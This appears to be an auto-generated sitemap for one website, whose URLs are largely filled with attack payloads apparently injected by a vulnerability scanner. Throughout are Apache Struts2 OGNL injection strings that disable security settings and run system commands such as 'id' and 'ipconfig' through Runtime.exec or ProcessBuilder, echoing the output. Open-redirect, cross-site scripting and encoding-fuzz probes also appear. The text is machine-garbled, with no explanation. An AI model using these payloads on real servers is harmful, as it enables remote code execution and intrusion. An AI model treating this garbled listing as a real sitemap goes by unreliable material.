http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm46323%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem98319?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm58349%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem98623?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=osm46323%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem98319? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f=fsm58349%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem98623? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=c2adc 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=c2adc? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=f28w8 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?=%3cb9b932%20x%3d984312364%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=f28w8? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=fsm11419%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem21933 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=xsstestb75 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=osm63146%c0%beo1%c0%bco2a%90bcoem38536 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f=%3c3224b8+x%3d914933865%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html%3f=osm63146%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem38536? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=%2578%2573%2573%2574%2565%2573%2574%2536%2536%2535 0.5 2024-04-15 